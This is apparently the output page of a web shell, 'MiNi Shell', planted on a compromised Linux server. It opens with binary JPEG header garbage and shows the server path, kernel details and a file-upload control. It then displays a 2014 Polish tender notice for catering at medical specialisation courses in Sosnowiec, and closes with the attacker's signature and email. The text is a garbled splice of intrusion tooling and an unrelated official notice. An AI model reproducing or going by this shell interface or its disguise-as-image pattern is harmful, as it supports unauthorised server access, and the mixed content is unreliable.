JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140206/42808-N-2014.html

<p class="kh_header"><b>Sosnowiec: Usługa cateringowa dla uczestników kursów specjalizacyjnych dla kardiologów, onkologów i lekarzy medycyny pracy współfinansowanych ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 42808 - 2014; data zamieszczenia: 06.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy i Zdrowia Środowiskowego , ul. Kościelna 13, 41-200 Sosnowiec, woj. śląskie, tel. 032 2660885, faks 032 2661124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa cateringowa dla uczestników kursów specjalizacyjnych dla kardiologów, onkologów i lekarzy medycyny pracy współfinansowanych ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa cateringowa dla uczestników kursów specjalizacyjnych dla kardiologów, onkologów i lekarzy medycyny pracy współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego .

2.Wykonawca jest zobowiązany do zapewnienia uczestnikom kursu w każdym dniu trwania zajęć dydaktycznych i w ilości odpowiadającej zakwalifikowanej liczbie uczestników cateringu w formie:

a)jednej przerwy kawowej śniadaniowej, podczas której każdy uczestnik otrzyma:

napoje gorące (bez ograniczeń)
kawa rozpuszczalna typu Jacobs Cronat Gold lub równoważna 
herbata  czarna typu Dilmah lub równoważna pakowane oddzielnie w kopertach
herbata owocowa, zielona typu Dilmah lub równoważna pakowane oddzielnie w kopertach
dodatki: mleko zagęszczone niesłodzone typu Gostyń lub równoważne
cytryna
cukier biały, brązowny
napoje zimne 
woda mineralna gazowana typu Nałęczowianka lub równoważne w plastikowej butelce, min. 500 ml.os.
woda mineralna niegazowana typu Nałęczowianka lub równoważne, w plastikowej butelce, min. 500 ml.os.
soki naturalne, owocowe 100% typu Hortex lub równoważne, min. 3 rodzaje (jabłko, pomarańcza, czarna porzeczka) min. 300 ml. os.,
kanapki przygotowane na różnego rodzaju pieczywie- min. 5 szt. /os. zawierająca co najmniej 3 składniki, po jednym z niżej wymienionych grup:
a)	ser żółty lub twarożek, lub wędlina lub łosoś, etc.,
b)	jajko lub pomidor, lub ogórek świeży/kiszony, etc.,
c)	majonez lub pasta, lub oliwki, lub anchois, etc.;
dania śniadaniowe - np. tartinki, szaszłyki koktajlowe, muszle makaronowe nadziewane sałatką, jajka faszerowane, babeczki koktajlowe nadziewane, roladki nadziewane - min. 200 g/os.
zimna płyta śniadaniowa (składająca się różnych rodzajów wędlin, serów, warzyw świeżych i marynowanych, 2 rodzaje sałatki, itp.) min. min. 150 g/os
danie na ciepło: jajecznica, kiełbaski, tosty itp. min. 150 g/os
zestaw ciast porcjowanych (np. makowiec, jabłecznik, sernik, rurki z masą adwokatową)
min. 150g/os
zestaw ciasteczek bankietowych (typu delicje lub równoważne, typu pieguski lub równoważne, typu jeżyki lub równoważne) min. 3 rodzaje min. 3 szt./os


Wykonawca zapewni również:
-zastawę stołową porcelanową
-sztućce
-obrusy, serwety
-obsługę kelnerską

2)przerwy obiadowej, podczas której każdy uczestnik otrzyma:

napoje gorące (bez ograniczeń)
kawa rozpuszczalna typu Jacobs Cronat Gold lub równoważna 
herbata  czarna typu Dilmah lub równoważna pakowane oddzielnie w kopertach
herbata owocowa, zielona typu Dilmah lub równoważna pakowane oddzielnie w kopertach
dodatki: mleko zagęszczone niesłodzone typu Gostyń lub równoważne
cytryna
cukier biały, brązowny
napoje zimne 
woda mineralna gazowana typu Nałęczowianka lub równoważne w plastikowej butelce, min. 500 ml.os.
woda mineralna niegazowana typu Nałęczowianka lub równoważne, w plastikowej butelce, min. 500 ml.os.
soki naturalne, owocowe 100% typu Hortex lub równoważne, min. 3 rodzaje (jabłko, pomarańcza, czarna porzeczka) min. 300 ml. os.,


Zestaw obiadowy będzie obejmował:
 
zupy czyste i kremy, zupy typu - pomidorowa, ogórkowa, jarzynowa itp., zupy typu gulaszowego.
min. 400 ml/os
 
dania obiadowe: 
mięsne - zawierające co najmniej 3 składniki, po jednym z niżej wymienionych grup:

a) ziemniaki (gotowane, zapiekane, duszone, frytki, faszerowane) lub ryż (brązowy, biały, dziki),  lub makaron, lub kasza (perłowa, kuskus, gryczana),  lub kluski (kładzione, śląskie, na parze, kopytka) etc. - 250 g./os.

b) sztuka mięsa (min. 150 gram - bez sosu, z sosem - min. 180 gram) lub kotlet schabowy (min. 150 gram), lub ryba (z panierką min. 150gram, bez panierki min. 130 gram), lub udko z kurczaka - min. 150 gram, lub gulasz - potrawka min. 150 gram, lub kotlet mielony, etc. (min. 200 gram),

lub inne danie obiadowe w jednej z form: makaron z sosem i z mięsem (np. carbonara, bolognese, z kurczakiem), lasagne z sosem bolońskim i mięsem lub mięsem i warzywami, ryba po grecku, pierogi etc. (min. 400 g.),

c) 2 rodzaje surówek (min. 150 gram) lub warzywa gotowane etc. (min. 150 gram), sałatki z warzyw i owoców krajowych i zagranicznych

Danie wegetariańskie-  zawierające co najmniej 3 składniki, po jednym z niżej wymienionych grup:

a) ziemniaki lub ryż, lub makaron, lub kasza, lub kluski śląskie, etc. - 250 g./os.

b) kotlet sojowy lub kotlet warzywny, lub kotlet jajeczny, lub gulasz sojowy, lub gulasz warzywny, lub potrawka z warzyw, etc. - min. 150 gram/os. - ryby - duszone, smażone, pieczone, zapiekane

c) 2 rodzaje surówek (min. 150 gram) lub warzywa gotowane, etc. - min. 150 gram/os. 

lub inne wegetariańskie danie obiadowe w jednej z form: makaron z sosem lub lasagne z warzywami, lub risotto warzywne, etc. - min. 400 g./os.

Deser - ciasta pieczone z owocami i bakaliami, ciasta na zimno z galaretką i owocami, desery na bazie musów i przecierów owocowych, desery na bazie bitej śmietany, owoce egzotyczne, sałatki owocowe itp.- min. 200 g./os.
 Wykonawca zapewni również:
-zastawę stołowa porcelanową
-sztućce
-obrusy, serwety
-obsługę kelnerską

Wymienione wyżej wartości w gramach/mililitrach są wartościami minimalnymi i wyznaczają wymagane minimalne ilości posiłków/napojów dla jednej osoby podczas jednego dnia Kursu.

3. W każdym dniu kursu 10% zestawów śniadaniowych oraz obiadowych stanowić będą posiłki wegetariańskie.

4.Terminy realizacji usługi: tydzień roboczy od poniedziałku do piątku; pomiędzy godz. 09.00 a 15.00, w terminach uzgodnionych z Zamawiającym w okresie od 24lutego 2014 r.  do 31 grudnia 2014 r. (z przerwą wakacyjną: lipiec -sierpień) według przedstawionego poniżej harmonogramu:




miesiąc	
ilość dni usługi	
średnia ilość osób każdego dnia	
osobodni

Luty 2014	
4	
20	
80


Marzec 2014
	
19	
20	
380

Kwiecień 2014
	
12	
20	
240

Maj 2014
	
25	
20	
500

Czerwiec 2014
	
18	
20	
360

Wrzesień 2014
	
12	
20	
240

Październik 2014
	
27	
20	
540

Listopad 2014
	
22	
20	
440

Grudzień 2014
	
20	
20	
400


5. Zamawiający zastrzega, że ilość zestawów może ulec zmianie w przypadku zmiany liczby uczestników szkoleń. Wykonawca zostanie poinformowany o liczbie uczestników danego szkolenia najpóźniej na 2 dni przed ustalonym terminem szkolenia). 

6. Zamawiający zastrzega, iż harmonogram kursu może ulec zmianie oraz kilka szkoleń może odbywać się jednocześnie.

7. Miejsce wykonania usługi: Instytut Medycyny Pracy i Zdrowia środowiskowego, ul. Kościelna 13, Sosnowiec

8. Wykonawca dostarczy posiłki na własny koszt w specjalistycznych termosach zapewniających utrzymanie odpowiedniej temperatury oraz jakości przewożonych posiłków, zgodnie z zasadami HACCP. Posiłki muszą być wykonane z naturalnych produktów metodą tradycyjną, tylko ze świeżych produktów, dobranych zgodnie z zasada sezonowości. Nie można używać produktów typu instant (np. zupy w proszku itp.) oraz produktów gotowych (np. mrożone gołąbki, klopsy, zrazy itp.). Zamawiający nie pokrywa kosztów transportu i noclegów osób wykonujących zamówienie.

9. Posiłki będą przygotowane przez Wykonawcę w obiektach lub obiekcie, dla którego Wykonawca posiada decyzję inspektora sanitarnego o dopuszczeniu obiektu do przygotowywania posiłków dla potrzeb zbiorowego żywienia.

10. Wykonawca odpowiada za transport przedmiotu zamówienia oraz podanie go zgodnie z
wymaganiami sanitarnymi dotyczącymi żywności..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.31.00.00-0, 55.32.10.00-6, 55.20.00.00-9, 55.40.00.00-4, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 24.02.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 7.000,00 złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Decyzja/zezwolenie właściwego Państwowego Inspektora Sanitarnego wydana na podstawie Ustawy z dnia 25.08.2006 r. o Bezpieczeństwie żywności i żywienia (Dz. U. 171 poz. 1225 z późn. zm.) potwierdzająca, że kuchnia, w której będą przygotowane posiłki spełnia konieczne wymagania higieniczno-sanitarne w zakresie produkcji posiłków od surowca do gotowego produktu.

Decyzja/zezwolenie właściwego Państwowego Inspektora Sanitarnego wydana na podstawie Ustawy z dnia 25.08.2006 r. o Bezpieczeństwie żywności i żywienia (Dz. U. 171 poz. 1225 z późn. zm.) dopuszczająca samochód/ samochody Wykonawcy do przewozu żywności wraz z wykazem samochodów, którymi dysponuje Wykonawca w ramach świadczenia usługi.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość zmian zapisów umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imp.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Sekretariacie Głównym IMPiZŚ, pok.103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2014 godzina 10:00, miejsce: W Sekretariacie Głównym IMPiZŚ, pok.103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com